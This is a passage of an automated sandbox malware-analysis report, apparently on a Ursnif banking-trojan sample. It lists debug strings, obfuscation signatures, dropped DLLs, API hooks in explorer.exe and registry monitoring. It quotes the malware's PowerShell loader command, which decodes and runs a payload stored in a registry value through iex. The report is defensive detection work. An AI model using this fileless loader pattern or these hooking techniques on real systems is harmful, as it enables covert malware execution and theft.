Source: Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
Source: Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042743C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00453E60 push 00453EEDh; ret 0_2_00453EE5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00406040 push 0040606Ch; ret 0_2_00406064
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004160F0 push ecx; mov dword ptr [esp], edx 0_2_004160F5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00418174 push ecx; mov dword ptr [esp], ecx 0_2_00418179
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00414104 push 00414151h; ret 0_2_00414149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00416134 push ecx; mov dword ptr [esp], edx 0_2_00416139
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004143CF push 004144A8h; ret 0_2_004144A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0041447C push 004144A8h; ret 0_2_004144A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428404 push 0042845Dh; ret 0_2_00428455
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0041C53C push ecx; mov dword ptr [esp], edx 0_2_0041C53E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0045860C push 0045863Fh; ret 0_2_00458637
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428A7C push 00428ABFh; ret 0_2_00428AB7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428AF4 push 00428B20h; ret 0_2_00428B18
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00406ABC push ecx; mov dword ptr [esp], eax 0_2_00406ABD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0043CB50 push 0043CB7Ch; ret 0_2_0043CB74
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458B58 push 00458B90h; ret 0_2_00458B88
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0040CB64 push ecx; mov dword ptr [esp], edx 0_2_0040CB69
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428B2C push 00428B64h; ret 0_2_00428B5C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428BC0 push 00428BECh; ret 0_2_00428BE4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458BD4 push 00458C00h; ret 0_2_00458BF8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458B9C push 00458BC8h; ret 0_2_00458BC0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458C0C push 00458C32h; ret 0_2_00458C2A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042EC2C push ecx; mov dword ptr [esp], edx 0_2_0042EC30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428CF0 push 00428D1Ch; ret 0_2_00428D14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00426CF4 push 00426D32h; ret 0_2_00426D2A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428C90 push 00428CC3h; ret 0_2_00428CBB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00406CA0 push 00406CCCh; ret 0_2_00406CC4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428D40 push 00428D83h; ret 0_2_00428D7B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00426D74 push 00426DACh; ret 0_2_00426DA4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00402D00 push eax; ret 0_2_00402D3C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00454D10 push 00454D8Dh; ret 0_2_00454D85

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004363F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 0_2_004363F8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044E8A4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 0_2_0044E8A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044F1C8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 0_2_0044F1C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004393D0 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_004393D0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00425390 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00425390
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00439AF0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00439BA0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044DFF0 IsIconic,GetCapture, 0_2_0044DFF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004363F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_004363F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044E8A4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_0044E8A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044F1C8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0044F1C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004393D0 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_004393D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00425390 IsIconic,GetWindowPlacement,GetWindowRect, 1_2_00425390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 1_2_00439AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 1_2_00439BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044DFF0 IsIconic,GetCapture, 1_2_0044DFF0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042743C
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
